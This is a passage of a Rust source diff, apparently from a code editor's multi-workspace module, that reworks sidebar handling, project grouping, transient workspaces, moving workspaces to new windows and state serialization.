cx); + pub fn register_sidebar(&mut self, sidebar: Entity, cx: &mut Context) { + self._subscriptions + .push(cx.observe(&sidebar, |_this, _, cx| { + cx.notify(); + })); + self._subscriptions + .push(cx.subscribe(&sidebar, |this, _, event, cx| match event { + SidebarEvent::SerializeNeeded => { + this.serialize(cx); } - }); + })); self.sidebar = Some(Box::new(sidebar)); - self._sidebar_subscription = Some(subscription); } pub fn sidebar(&self) -> Option<&dyn SidebarHandle> { self.sidebar.as_deref() } + pub fn set_sidebar_overlay(&mut self, overlay: Option, cx: &mut Context) { + self.sidebar_overlay = overlay; + cx.notify(); + } + pub fn sidebar_open(&self) -> bool { - self.sidebar_open && self.sidebar.is_some() + self.sidebar_open } pub fn sidebar_has_notifications(&self, cx: &App) -> bool { @@ -179,6 +369,12 @@ impl MultiWorkspace { .map_or(false, |s| s.has_notifications(cx)) } + pub fn 
is_threads_list_view_active(&self, cx: &App) -> bool { + self.sidebar + .as_ref() + .map_or(false, |s| s.is_threads_list_view_active(cx)) + } + pub fn multi_workspace_enabled(&self, cx: &App) -> bool { cx.has_flag::() && !DisableAiSettings::get_global(cx).disable_ai } @@ -188,22 +384,33 @@ impl MultiWorkspace { return; } - if self.sidebar_open { + if self.sidebar_open() { self.close_sidebar(window, cx); } else { self.open_sidebar(cx); if let Some(sidebar) = &self.sidebar { + sidebar.prepare_for_focus(window, cx); sidebar.focus(window, cx); } } } + pub fn close_sidebar_action(&mut self, window: &mut Window, cx: &mut Context) { + if !self.multi_workspace_enabled(cx) { + return; + } + + if self.sidebar_open() { + self.close_sidebar(window, cx); + } + } + pub fn focus_sidebar(&mut self, window: &mut Window, cx: &mut Context) { if !self.multi_workspace_enabled(cx) { return; } - if self.sidebar_open { + if self.sidebar_open() { let sidebar_is_focused = self .sidebar .as_ref() @@ -214,11 +421,13 @@ impl MultiWorkspace { let pane_focus = pane.read(cx).focus_handle(cx); window.focus(&pane_focus, cx); } else if let Some(sidebar) = &self.sidebar { + sidebar.prepare_for_focus(window, cx); sidebar.focus(window, cx); } } else { self.open_sidebar(cx); if let Some(sidebar) = &self.sidebar { + sidebar.prepare_for_focus(window, cx); sidebar.focus(window, cx); } } @@ -226,20 +435,26 @@ impl MultiWorkspace { pub fn open_sidebar(&mut self, cx: &mut Context) { self.sidebar_open = true; - for workspace in &self.workspaces { - workspace.update(cx, |workspace, cx| { - workspace.set_workspace_sidebar_open(true, cx); + if let ActiveWorkspace::Transient(workspace) = &self.active_workspace { + let workspace = workspace.clone(); + let index = self.promote_transient(workspace, cx); + self.active_workspace = ActiveWorkspace::Persistent(index); + } + let sidebar_focus_handle = self.sidebar.as_ref().map(|s| s.focus_handle(cx)); + for workspace in self.workspaces.iter() { + workspace.update(cx, 
|workspace, _cx| { + workspace.set_sidebar_focus_handle(sidebar_focus_handle.clone()); }); } self.serialize(cx); cx.notify(); } - fn close_sidebar(&mut self, window: &mut Window, cx: &mut Context) { + pub fn close_sidebar(&mut self, window: &mut Window, cx: &mut Context) { self.sidebar_open = false; - for workspace in &self.workspaces { - workspace.update(cx, |workspace, cx| { - workspace.set_workspace_sidebar_open(false, cx); + for workspace in self.workspaces.iter() { + workspace.update(cx, |workspace, _cx| { + workspace.set_sidebar_focus_handle(None); }); } let pane = self.workspace().read(cx).active_pane().clone(); @@ -252,7 +467,7 @@ impl MultiWorkspace { pub fn close_window(&mut self, _: &CloseWindow, window: &mut Window, cx: &mut Context) { cx.spawn_in(window, async move |this, cx| { let workspaces = this.update(cx, |multi_workspace, _cx| { - multi_workspace.workspaces().to_vec() + multi_workspace.workspaces().cloned().collect::>() })?; for workspace in workspaces { @@ -275,112 +490,434 @@ impl MultiWorkspace { .detach_and_log_err(cx); } - fn subscribe_to_workspace(workspace: &Entity, cx: &mut Context) { - cx.subscribe(workspace, |this, workspace, event, cx| { + fn subscribe_to_workspace( + workspace: &Entity, + window: &Window, + cx: &mut Context, + ) { + let project = workspace.read(cx).project().clone(); + cx.subscribe_in(&project, window, { + let workspace = workspace.downgrade(); + move |this, _project, event, _window, cx| match event { + project::Event::WorktreeAdded(_) | project::Event::WorktreeRemoved(_) => { + if let Some(workspace) = workspace.upgrade() { + this.add_project_group_key(workspace.read(cx).project_group_key(cx)); + } + } + _ => {} + } + }) + .detach(); + + cx.subscribe_in(workspace, window, |this, workspace, event, window, cx| { if let WorkspaceEvent::Activate = event { - this.activate(workspace, cx); + this.activate(workspace.clone(), window, cx); } }) .detach(); } - pub fn is_sidebar_open(&self) -> bool { - self.sidebar_open + pub fn 
add_project_group_key(&mut self, project_group_key: ProjectGroupKey) { + if project_group_key.path_list().paths().is_empty() { + return; + } + if self.project_group_keys.contains(&project_group_key) { + return; + } + self.project_group_keys.push(project_group_key); } - pub fn workspace(&self) -> &Entity { - &self.workspaces[self.active_workspace_index] + pub fn restore_project_group_keys(&mut self, keys: Vec) { + let mut restored = keys; + for existing_key in &self.project_group_keys { + if !restored.contains(existing_key) { + restored.push(existing_key.clone()); + } + } + self.project_group_keys = restored; + } + + pub fn project_group_keys(&self) -> impl Iterator { + self.project_group_keys.iter() } - pub fn workspaces(&self) -> &[Entity] { - &self.workspaces + /// Returns the project groups, ordered by most recently added. + pub fn project_groups( + &self, + cx: &App, + ) -> impl Iterator>)> { + let mut groups = self + .project_group_keys + .iter() + .rev() + .map(|key| (key.clone(), Vec::new())) + .collect::>(); + for workspace in &self.workspaces { + let key = workspace.read(cx).project_group_key(cx); + if let Some((_, workspaces)) = groups.iter_mut().find(|(k, _)| k == &key) { + workspaces.push(workspace.clone()); + } + } + groups.into_iter() } - pub fn active_workspace_index(&self) -> usize { - self.active_workspace_index + pub fn workspaces_for_project_group( + &self, + project_group_key: &ProjectGroupKey, + cx: &App, + ) -> impl Iterator> { + self.workspaces + .iter() + .filter(move |ws| ws.read(cx).project_group_key(cx) == *project_group_key) } - pub fn activate(&mut self, workspace: Entity, cx: &mut Context) { - if !self.multi_workspace_enabled(cx) { - self.workspaces[0] = workspace; - self.active_workspace_index = 0; - cx.notify(); + pub fn remove_folder_from_project_group( + &mut self, + project_group_key: &ProjectGroupKey, + path: &Path, + cx: &mut Context, + ) { + let new_path_list = project_group_key.path_list().without_path(path); + if 
new_path_list.is_empty() { return; } - let old_index = self.active_workspace_index; - let new_index = self.set_active_workspace(workspace, cx); - if old_index != new_index { - self.serialize(cx); + let new_key = ProjectGroupKey::new(project_group_key.host(), new_path_list); + + let workspaces: Vec<_> = self + .workspaces_for_project_group(project_group_key, cx) + .cloned() + .collect(); + + self.add_project_group_key(new_key); + + for workspace in workspaces { + let project = workspace.read(cx).project().clone(); + project.update(cx, |project, cx| { + project.remove_worktree_for_main_worktree_path(path, cx); + }); } + + self.serialize(cx); + cx.notify(); + } + + pub fn prompt_to_add_folders_to_project_group( + &mut self, + key: &ProjectGroupKey, + window: &mut Window, + cx: &mut Context, + ) { + let paths = self.workspace().update(cx, |workspace, cx| { + workspace.prompt_for_open_path( + PathPromptOptions { + files: false, + directories: true, + multiple: true, + prompt: None, + }, + DirectoryLister::Project(workspace.project().clone()), + window, + cx, + ) + }); + + let key = key.clone(); + cx.spawn_in(window, async move |this, cx| { + if let Some(new_paths) = paths.await.ok().flatten() { + if !new_paths.is_empty() { + this.update(cx, |multi_workspace, cx| { + multi_workspace.add_folders_to_project_group(&key, new_paths, cx); + })?; + } + } + anyhow::Ok(()) + }) + .detach_and_log_err(cx); } - fn set_active_workspace( + pub fn add_folders_to_project_group( + &mut self, + project_group_key: &ProjectGroupKey, + new_paths: Vec, + cx: &mut Context, + ) { + let mut all_paths: Vec = project_group_key.path_list().paths().to_vec(); + all_paths.extend(new_paths.iter().cloned()); + let new_path_list = PathList::new(&all_paths); + let new_key = ProjectGroupKey::new(project_group_key.host(), new_path_list); + + let workspaces: Vec<_> = self + .workspaces_for_project_group(project_group_key, cx) + .cloned() + .collect(); + + self.add_project_group_key(new_key); + + for 
workspace in workspaces { + let project = workspace.read(cx).project().clone(); + for path in &new_paths { + project + .update(cx, |project, cx| { + project.find_or_create_worktree(path, true, cx) + }) + .detach_and_log_err(cx); + } + } + + self.serialize(cx); + cx.notify(); + } + + pub fn remove_project_group( + &mut self, + key: &ProjectGroupKey, + window: &mut Window, + cx: &mut Context, + ) { + self.project_group_keys.retain(|k| k != key); + + let workspaces: Vec<_> = self + .workspaces_for_project_group(key, cx) + .cloned() + .collect(); + for workspace in workspaces { + self.remove(&workspace, window, cx); + } + + self.serialize(cx); + cx.notify(); + } + + /// Finds an existing workspace in this multi-workspace whose paths match, + /// or creates a new one (deserializing its saved state from the database). + /// Never searches other windows or matches workspaces with a superset of + /// the requested paths. + pub fn find_or_create_local_workspace( + &mut self, + path_list: PathList, + window: &mut Window, + cx: &mut Context, + ) -> Task>> { + if let Some(workspace) = self + .workspaces + .iter() + .find(|ws| PathList::new(&ws.read(cx).root_paths(cx)) == path_list) + .cloned() + { + self.activate(workspace.clone(), window, cx); + return Task::ready(Ok(workspace)); + } + + if let Some(transient) = self.active_workspace.transient_workspace() { + if transient.read(cx).project_group_key(cx).path_list() == &path_list { + return Task::ready(Ok(transient.clone())); + } + } + + let paths = path_list.paths().to_vec(); + let app_state = self.workspace().read(cx).app_state().clone(); + let requesting_window = window.window_handle().downcast::(); + + cx.spawn(async move |_this, cx| { + let result = cx + .update(|cx| { + Workspace::new_local( + paths, + app_state, + requesting_window, + None, + None, + OpenMode::Activate, + cx, + ) + }) + .await?; + Ok(result.workspace) + }) + } + + pub fn workspace(&self) -> &Entity { + match &self.active_workspace { + 
ActiveWorkspace::Persistent(index) => &self.workspaces[*index], + ActiveWorkspace::Transient(workspace) => workspace, + } + } + + pub fn workspaces(&self) -> impl Iterator> { + self.workspaces + .iter() + .chain(self.active_workspace.transient_workspace()) + } + + /// Adds a workspace to this window as persistent without changing which + /// workspace is active. Unlike `activate()`, this always inserts into the + /// persistent list regardless of sidebar state — it's used for system- + /// initiated additions like deserialization and worktree discovery. + pub fn add(&mut self, workspace: Entity, window: &Window, cx: &mut Context) { + self.insert_workspace(workspace, window, cx); + } + + /// Ensures the workspace is in the multiworkspace and makes it the active one. + pub fn activate( &mut self, workspace: Entity, + window: &mut Window, cx: &mut Context, - ) -> usize { - let index = self.add_workspace(workspace, cx); - self.active_workspace_index = index; + ) { + // Re-activating the current workspace is a no-op. + if self.workspace() == &workspace { + self.focus_active_workspace(window, cx); + return; + } + + // Resolve where we're going. + let new_index = if let Some(index) = self.workspaces.iter().position(|w| *w == workspace) { + Some(index) + } else if self.sidebar_open { + Some(self.insert_workspace(workspace.clone(), &*window, cx)) + } else { + None + }; + + // Transition the active workspace. 
+ if let Some(index) = new_index { + if let Some(old) = self.active_workspace.set_persistent(index) { + if self.sidebar_open { + self.promote_transient(old, cx); + } else { + self.detach_workspace(&old, cx); + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved(old.entity_id())); + } + } + } else { + Self::subscribe_to_workspace(&workspace, window, cx); + let weak_self = cx.weak_entity(); + workspace.update(cx, |workspace, cx| { + workspace.set_multi_workspace(weak_self, cx); + }); + if let Some(old) = self.active_workspace.set_transient(workspace) { + self.detach_workspace(&old, cx); + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved(old.entity_id())); + } + } + + cx.emit(MultiWorkspaceEvent::ActiveWorkspaceChanged); + self.serialize(cx); + self.focus_active_workspace(window, cx); + cx.notify(); + } + + /// Promotes a former transient workspace into the persistent list. + /// Returns the index of the newly inserted workspace. + fn promote_transient(&mut self, workspace: Entity, cx: &mut Context) -> usize { + let project_group_key = workspace.read(cx).project().read(cx).project_group_key(cx); + self.add_project_group_key(project_group_key); + self.workspaces.push(workspace.clone()); + cx.emit(MultiWorkspaceEvent::WorkspaceAdded(workspace)); + self.workspaces.len() - 1 + } + + /// Collapses to a single transient workspace, discarding all persistent + /// workspaces. Used when multi-workspace is disabled (e.g. disable_ai). 
+ fn collapse_to_single_workspace(&mut self, window: &mut Window, cx: &mut Context) { + if self.sidebar_open { + self.close_sidebar(window, cx); + } + let active = self.workspace().clone(); + for workspace in std::mem::take(&mut self.workspaces) { + if workspace != active { + self.detach_workspace(&workspace, cx); + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved(workspace.entity_id())); + } + } + self.project_group_keys.clear(); + self.active_workspace = ActiveWorkspace::Transient(active); cx.notify(); - index } - /// Adds a workspace to this window without changing which workspace is active. - /// Returns the index of the workspace (existing or newly inserted). - pub fn add_workspace(&mut self, workspace: Entity, cx: &mut Context) -> usize { + /// Inserts a workspace into the list if not already present. Returns the + /// index of the workspace (existing or newly inserted). Does not change + /// the active workspace index. + fn insert_workspace( + &mut self, + workspace: Entity, + window: &Window, + cx: &mut Context, + ) -> usize { if let Some(index) = self.workspaces.iter().position(|w| *w == workspace) { index } else { - if self.sidebar_open { - workspace.update(cx, |workspace, cx| { - workspace.set_workspace_sidebar_open(true, cx); - }); - } - Self::subscribe_to_workspace(&workspace, cx); - self.workspaces.push(workspace); + let project_group_key = workspace.read(cx).project().read(cx).project_group_key(cx); + + Self::subscribe_to_workspace(&workspace, window, cx); + self.sync_sidebar_to_workspace(&workspace, cx); + let weak_self = cx.weak_entity(); + workspace.update(cx, |workspace, cx| { + workspace.set_multi_workspace(weak_self, cx); + }); + + self.add_project_group_key(project_group_key); + self.workspaces.push(workspace.clone()); + cx.emit(MultiWorkspaceEvent::WorkspaceAdded(workspace)); cx.notify(); self.workspaces.len() - 1 } } - pub fn activate_index(&mut self, index: usize, window: &mut Window, cx: &mut Context) { - debug_assert!( - index < 
self.workspaces.len(), - "workspace index out of bounds" - ); - self.active_workspace_index = index; - self.serialize(cx); - self.focus_active_workspace(window, cx); - cx.notify(); - } + /// Clears session state and DB binding for a workspace that is being + /// removed or replaced. The DB row is preserved so the workspace still + /// appears in the recent-projects list. + fn detach_workspace(&mut self, workspace: &Entity, cx: &mut Context) { + workspace.update(cx, |workspace, _cx| { + workspace.session_id.take(); + workspace._schedule_serialize_workspace.take(); + workspace._serialize_workspace_task.take(); + }); - pub fn activate_next_workspace(&mut self, window: &mut Window, cx: &mut Context) { - if self.workspaces.len() > 1 { - let next_index = (self.active_workspace_index + 1) % self.workspaces.len(); - self.activate_index(next_index, window, cx); + if let Some(workspace_id) = workspace.read(cx).database_id() { + let db = crate::persistence::WorkspaceDb::global(cx); + self.pending_removal_tasks.retain(|task| !task.is_ready()); + self.pending_removal_tasks + .push(cx.background_spawn(async move { + db.set_session_binding(workspace_id, None, None) + .await + .log_err(); + })); } } - pub fn activate_previous_workspace(&mut self, window: &mut Window, cx: &mut Context) { - if self.workspaces.len() > 1 { - let prev_index = if self.active_workspace_index == 0 { - self.workspaces.len() - 1 - } else { - self.active_workspace_index - 1 - }; - self.activate_index(prev_index, window, cx); + fn sync_sidebar_to_workspace(&self, workspace: &Entity, cx: &mut Context) { + if self.sidebar_open() { + let sidebar_focus_handle = self.sidebar.as_ref().map(|s| s.focus_handle(cx)); + workspace.update(cx, |workspace, _| { + workspace.set_sidebar_focus_handle(sidebar_focus_handle); + }); } } - fn serialize(&mut self, cx: &mut App) { - let window_id = self.window_id; - let state = crate::persistence::model::MultiWorkspaceState { - active_workspace_id: 
self.workspace().read(cx).database_id(), - sidebar_open: self.sidebar_open, - }; - self._serialize_task = Some(cx.background_spawn(async move { - crate::persistence::write_multi_workspace_state(window_id, state).await; + pub(crate) fn serialize(&mut self, cx: &mut Context) { + self._serialize_task = Some(cx.spawn(async move |this, cx| { + let Some((window_id, state)) = this + .read_with(cx, |this, cx| { + let state = MultiWorkspaceState { + active_workspace_id: this.workspace().read(cx).database_id(), + project_group_keys: this + .project_group_keys() + .cloned() + .map(Into::into) + .collect::>(), + sidebar_open: this.sidebar_open, + sidebar_state: this.sidebar.as_ref().and_then(|s| s.serialized_state(cx)), + }; + (this.window_id, state) + }) + .ok() + else { + return; + }; + let kvp = cx.update(|cx| db::kvp::KeyValueStore::global(cx)); + crate::persistence::write_multi_workspace_state(&kvp, window_id, state).await; })); } @@ -396,9 +933,6 @@ impl MultiWorkspace { if let Some(task) = self._serialize_task.take() { tasks.push(task); } - if let Some(task) = self._create_task.take() { - tasks.push(task); - } tasks.extend(std::mem::take(&mut self.pending_removal_tasks)); async move { @@ -406,7 +940,7 @@ impl MultiWorkspace { } } - fn focus_active_workspace(&self, window: &mut Window, cx: &mut App) { + pub fn focus_active_workspace(&self, window: &mut Window, cx: &mut App) { // If a dock panel is zoomed, focus it instead of the center pane. // Otherwise, focusing the center pane triggers dismiss_zoomed_items_to_reveal // which closes the zoomed dock. 
@@ -501,15 +1035,10 @@ impl MultiWorkspace { } pub fn take_pending_removal_tasks(&mut self) -> Vec> { - let mut tasks: Vec> = std::mem::take(&mut self.pending_removal_tasks) + let tasks: Vec> = std::mem::take(&mut self.pending_removal_tasks) .into_iter() .filter(|task| !task.is_ready()) .collect(); - if let Some(task) = self._create_task.take() { - if !task.is_ready() { - tasks.push(task); - } - } tasks } @@ -534,14 +1063,16 @@ impl MultiWorkspace { cx: &mut Context, ) -> Entity { let workspace = cx.new(|cx| Workspace::test_new(project, window, cx)); - self.activate(workspace.clone(), cx); + self.activate(workspace.clone(), window, cx); workspace } - pub fn create_workspace(&mut self, window: &mut Window, cx: &mut Context) { - if !self.multi_workspace_enabled(cx) { - return; - } + #[cfg(any(test, feature = "test-support"))] + pub fn create_test_workspace( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> Task<()> { let app_state = self.workspace().read(cx).app_state().clone(); let project = Project::local( app_state.client.clone(), @@ -554,101 +1085,224 @@ impl MultiWorkspace { cx, ); let new_workspace = cx.new(|cx| Workspace::new(None, project, app_state, window, cx)); - self.set_active_workspace(new_workspace.clone(), cx); - self.focus_active_workspace(window, cx); + self.activate(new_workspace.clone(), window, cx); let weak_workspace = new_workspace.downgrade(); - self._create_task = Some(cx.spawn_in(window, async move |this, cx| { - let result = crate::persistence::DB.next_id().await; - this.update_in(cx, |this, window, cx| match result { - Ok(workspace_id) => { - if let Some(workspace) = weak_workspace.upgrade() { - let session_id = workspace.read(cx).session_id(); - let window_id = window.window_handle().window_id().as_u64(); - workspace.update(cx, |workspace, _cx| { - workspace.set_database_id(workspace_id); - }); - cx.background_spawn(async move { - crate::persistence::DB - .set_session_binding(workspace_id, session_id, Some(window_id)) - 
.await - .log_err(); - }) - .detach(); - } else { - cx.background_spawn(async move { - crate::persistence::DB - .delete_workspace_by_id(workspace_id) - .await - .log_err(); - }) - .detach(); - } - this.serialize(cx); - } - Err(error) => { - log::error!("Failed to create workspace: {error:#}"); - if let Some(index) = weak_workspace - .upgrade() - .and_then(|w| this.workspaces.iter().position(|ws| *ws == w)) - { - this.remove_workspace(index, window, cx); - } - this.workspace().update(cx, |workspace, cx| { - let id = NotificationId::unique::(); - workspace.show_toast( - Toast::new(id, format!("Failed to create workspace: {error}")), - cx, - ); + let db = crate::persistence::WorkspaceDb::global(cx); + cx.spawn_in(window, async move |this, cx| { + let workspace_id = db.next_id().await.unwrap(); + let workspace = weak_workspace.upgrade().unwrap(); + let task: Task<()> = this + .update_in(cx, |this, window, cx| { + let session_id = workspace.read(cx).session_id(); + let window_id = window.window_handle().window_id().as_u64(); + workspace.update(cx, |workspace, _cx| { + workspace.set_database_id(workspace_id); }); - } - }) - .log_err(); - })); + this.serialize(cx); + let db = db.clone(); + cx.background_spawn(async move { + db.set_session_binding(workspace_id, session_id, Some(window_id)) + .await + .log_err(); + }) + }) + .unwrap(); + task.await + }) } - pub fn remove_workspace(&mut self, index: usize, window: &mut Window, cx: &mut Context) { - if self.workspaces.len() <= 1 || index >= self.workspaces.len() { - return; - } + pub fn remove( + &mut self, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) -> bool { + let Some(index) = self.workspaces.iter().position(|w| w == workspace) else { + return false; + }; - let removed_workspace = self.workspaces.remove(index); + let old_key = workspace.read(cx).project_group_key(cx); + + if self.workspaces.len() <= 1 { + let has_worktrees = workspace.read(cx).visible_worktrees(cx).next().is_some(); + + if 
!has_worktrees { + return false; + } - if self.active_workspace_index >= self.workspaces.len() { - self.active_workspace_index = self.workspaces.len() - 1; - } else if self.active_workspace_index > index { - self.active_workspace_index -= 1; + let old_workspace = workspace.clone(); + let old_entity_id = old_workspace.entity_id(); + + let app_state = old_workspace.read(cx).app_state().clone(); + + let project = Project::local( + app_state.client.clone(), + app_state.node_runtime.clone(), + app_state.user_store.clone(), + app_state.languages.clone(), + app_state.fs.clone(), + None, + project::LocalProjectFlags::default(), + cx, + ); + + let new_workspace = cx.new(|cx| Workspace::new(None, project, app_state, window, cx)); + + self.workspaces[0] = new_workspace.clone(); + self.active_workspace = ActiveWorkspace::Persistent(0); + + Self::subscribe_to_workspace(&new_workspace, window, cx); + + self.sync_sidebar_to_workspace(&new_workspace, cx); + + let weak_self = cx.weak_entity(); + + new_workspace.update(cx, |workspace, cx| { + workspace.set_multi_workspace(weak_self, cx); + }); + + self.detach_workspace(&old_workspace, cx); + + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved(old_entity_id)); + cx.emit(MultiWorkspaceEvent::WorkspaceAdded(new_workspace)); + cx.emit(MultiWorkspaceEvent::ActiveWorkspaceChanged); + } else { + let removed_workspace = self.workspaces.remove(index); + + if let Some(active_index) = self.active_workspace.persistent_index() { + if active_index >= self.workspaces.len() { + self.active_workspace = ActiveWorkspace::Persistent(self.workspaces.len() - 1); + } else if active_index > index { + self.active_workspace = ActiveWorkspace::Persistent(active_index - 1); + } + } + + self.detach_workspace(&removed_workspace, cx); + + cx.emit(MultiWorkspaceEvent::WorkspaceRemoved( + removed_workspace.entity_id(), + )); + cx.emit(MultiWorkspaceEvent::ActiveWorkspaceChanged); } - if let Some(workspace_id) = removed_workspace.read(cx).database_id() { - 
self.pending_removal_tasks.retain(|task| !task.is_ready()); - self.pending_removal_tasks - .push(cx.background_spawn(async move { - crate::persistence::DB - .delete_workspace_by_id(workspace_id) - .await - .log_err(); - })); + let key_still_in_use = self + .workspaces + .iter() + .any(|ws| ws.read(cx).project_group_key(cx) == old_key); + + if !key_still_in_use { + self.project_group_keys.retain(|k| k != &old_key); } self.serialize(cx); self.focus_active_workspace(window, cx); cx.notify(); + + true } - pub fn open_project( + pub fn move_workspace_to_new_window( &mut self, - paths: Vec, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + let workspace = workspace.clone(); + if !self.remove(&workspace, window, cx) { + return; + } + + let app_state: Arc = workspace.read(cx).app_state().clone(); + + cx.defer(move |cx| { + let options = (app_state.build_window_options)(None, cx); + + let Ok(window) = cx.open_window(options, |window, cx| { + cx.new(|cx| MultiWorkspace::new(workspace, window, cx)) + }) else { + return; + }; + + let _ = window.update(cx, |_, window, _| { + window.activate_window(); + }); + }); + } + + pub fn move_project_group_to_new_window( + &mut self, + key: &ProjectGroupKey, window: &mut Window, cx: &mut Context, - ) -> Task> { + ) { + let workspaces: Vec<_> = self + .workspaces_for_project_group(key, cx) + .cloned() + .collect(); + if workspaces.is_empty() { + return; + } + + self.project_group_keys.retain(|k| k != key); + + let mut removed = Vec::new(); + for workspace in &workspaces { + if self.remove(workspace, window, cx) { + removed.push(workspace.clone()); + } + } + + if removed.is_empty() { + return; + } + + let app_state = removed[0].read(cx).app_state().clone(); + + cx.defer(move |cx| { + let options = (app_state.build_window_options)(None, cx); + + let first = removed[0].clone(); + let rest = removed[1..].to_vec(); + + let Ok(new_window) = cx.open_window(options, |window, cx| { + cx.new(|cx| MultiWorkspace::new(first, 
window, cx)) + }) else { + return; + }; + + new_window + .update(cx, |mw, window, cx| { + for workspace in rest { + mw.activate(workspace, window, cx); + } + window.activate_window(); + }) + .log_err(); + }); + } + + fn move_active_workspace_to_new_window( + &mut self, + _: &MoveWorkspaceToNewWindow, + window: &mut Window, + cx: &mut Context, + ) { let workspace = self.workspace().clone(); + self.move_workspace_to_new_window(&workspace, window, cx); + } + pub fn open_project( + &mut self, + paths: Vec, + open_mode: OpenMode, + window: &mut Window, + cx: &mut Context, + ) -> Task>> { if self.multi_workspace_enabled(cx) { - workspace.update(cx, |workspace, cx| { - workspace.open_workspace_for_paths(true, paths, window, cx) - }) + self.find_or_create_local_workspace(PathList::new(&paths), window, cx) } else { + let workspace = self.workspace().clone(); cx.spawn_in(window, async move |_this, cx| { let should_continue = workspace .update_in(cx, |workspace, window, cx| { @@ -658,11 +1312,11 @@ impl MultiWorkspace { if should_continue { workspace .update_in(cx, |workspace, window, cx| { - workspace.open_workspace_for_paths(true, paths, window, cx) + workspace.open_workspace_for_paths(open_mode, paths, window, cx) })? 
.await } else { - Ok(()) + Ok(workspace) } }) } @@ -672,9 +1326,10 @@ impl MultiWorkspace { impl Render for MultiWorkspace { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { let multi_workspace_enabled = self.multi_workspace_enabled(cx); - let is_zoomed = self.workspace().read(cx).zoomed_item().is_some(); + let sidebar_side = self.sidebar_side(cx); + let sidebar_on_right = sidebar_side == SidebarSide::Right; - let sidebar: Option = if multi_workspace_enabled && self.sidebar_open { + let sidebar: Option = if multi_workspace_enabled && self.sidebar_open() { self.sidebar.as_ref().map(|sidebar_handle| { let weak = cx.weak_entity(); @@ -683,7 +1338,12 @@ impl Render for MultiWorkspace { div() .id("sidebar-resize-handle") .absolute() - .right(-SIDEBAR_RESIZE_HANDLE_SIZE / 2.) + .when(!sidebar_on_right, |el| { + el.right(-SIDEBAR_RESIZE_HANDLE_SIZE / 2.) + }) + .when(sidebar_on_right, |el| { + el.left(-SIDEBAR_RESIZE_HANDLE_SIZE / 2.) + }) .top(px(0.)) .h_full() .w(SIDEBAR_RESIZE_HANDLE_SIZE) @@ -701,9 +1361,15 @@ impl Render for MultiWorkspace { if let Some(sidebar) = this.sidebar.as_mut() { sidebar.set_width(None, cx); } + this.serialize(cx); }) .ok(); cx.stop_propagation(); + } else { + weak.update(cx, |this, cx| { + this.serialize(cx); + }) + .ok(); } }) .occlude(), @@ -723,7 +1389,13 @@ impl Render for MultiWorkspace { None }; - let ui_font = theme::setup_ui_font(window, cx); + let (left_sidebar, right_sidebar) = if sidebar_on_right { + (None, sidebar) + } else { + (sidebar, None) + }; + + let ui_font = theme_settings::setup_ui_font(window, cx); let text_color = cx.theme().colors().text; let workspace = self.workspace().clone(); @@ -737,152 +1409,82 @@ impl Render for MultiWorkspace { .font(ui_font) .text_color(text_color) .on_action(cx.listener(Self::close_window)) - .on_action( - cx.listener(|this: &mut Self, _: &NewWorkspaceInWindow, window, cx| { - this.create_workspace(window, cx); - }), - ) - .on_action( - cx.listener(|this: 
&mut Self, _: &NextWorkspaceInWindow, window, cx| { - this.activate_next_workspace(window, cx); - }), - ) - .on_action(cx.listener( - |this: &mut Self, _: &PreviousWorkspaceInWindow, window, cx| { - this.activate_previous_workspace(window, cx); - }, - )) .when(self.multi_workspace_enabled(cx), |this| { this.on_action(cx.listener( |this: &mut Self, _: &ToggleWorkspaceSidebar, window, cx| { this.toggle_sidebar(window, cx); }, )) + .on_action(cx.listener( + |this: &mut Self, _: &CloseWorkspaceSidebar, window, cx| { + this.close_sidebar_action(window, cx); + }, + )) .on_action(cx.listener( |this: &mut Self, _: &FocusWorkspaceSidebar, window, cx| { this.focus_sidebar(window, cx); }, )) + .on_action(cx.listener(Self::move_active_workspace_to_new_window)) + .on_action(cx.listener( + |this: &mut Self, action: &ToggleThreadSwitcher, window, cx| { + if let Some(sidebar) = &this.sidebar { + sidebar.toggle_thread_switcher(action.select_last, window, cx); + } + }, + )) }) .when( self.sidebar_open() && self.multi_workspace_enabled(cx), |this| { this.on_drag_move(cx.listener( - |this: &mut Self, e: &DragMoveEvent, _window, cx| { + move |this: &mut Self, + e: &DragMoveEvent, + window, + cx| { if let Some(sidebar) = &this.sidebar { - let new_width = e.event.position.x; + let new_width = if sidebar_on_right { + window.bounds().size.width - e.event.position.x + } else { + e.event.position.x + }; sidebar.set_width(Some(new_width), cx); } }, )) - .children(sidebar) }, ) + .children(left_sidebar) .child( div() .flex() .flex_1() .size_full() .overflow_hidden() - .when(is_zoomed, |this| this.absolute().inset_0()) .child(self.workspace().clone()), ) - .child(self.workspace().read(cx).modal_layer.clone()), + .children(right_sidebar) + .child(self.workspace().read(cx).modal_layer.clone()) + .children(self.sidebar_overlay.as_ref().map(|view| { + deferred(div().absolute().size_full().inset_0().occlude().child( + v_flex().h(px(0.0)).top_20().items_center().child( + 
h_flex().occlude().child(view.clone()).on_mouse_down( + MouseButton::Left, + |_, _, cx| { + cx.stop_propagation(); + }, + ), + ), + )) + .with_priority(2) + })), window, cx, Tiling { - left: multi_workspace_enabled && self.sidebar_open && !is_zoomed, + left: !sidebar_on_right && multi_workspace_enabled && self.sidebar_open(), + right: sidebar_on_right && multi_workspace_enabled && self.sidebar_open(), ..Tiling::default() }, ) } } - -#[cfg(test)] -mod tests { - use super::*; - use fs::FakeFs; - use gpui::TestAppContext; - use settings::SettingsStore; - - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); - DisableAiSettings::register(cx); - cx.update_flags(false, vec!["agent-v2".into()]); - }); - } - - #[gpui::test] - async fn test_sidebar_disabled_when_disable_ai_is_enabled(cx: &mut TestAppContext) { - init_test(cx); - let fs = FakeFs::new(cx.executor()); - let project = Project::test(fs, [], cx).await; - - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); - - multi_workspace.read_with(cx, |mw, cx| { - assert!(mw.multi_workspace_enabled(cx)); - }); - - multi_workspace.update_in(cx, |mw, _window, cx| { - mw.open_sidebar(cx); - assert!(mw.is_sidebar_open()); - }); - - cx.update(|_window, 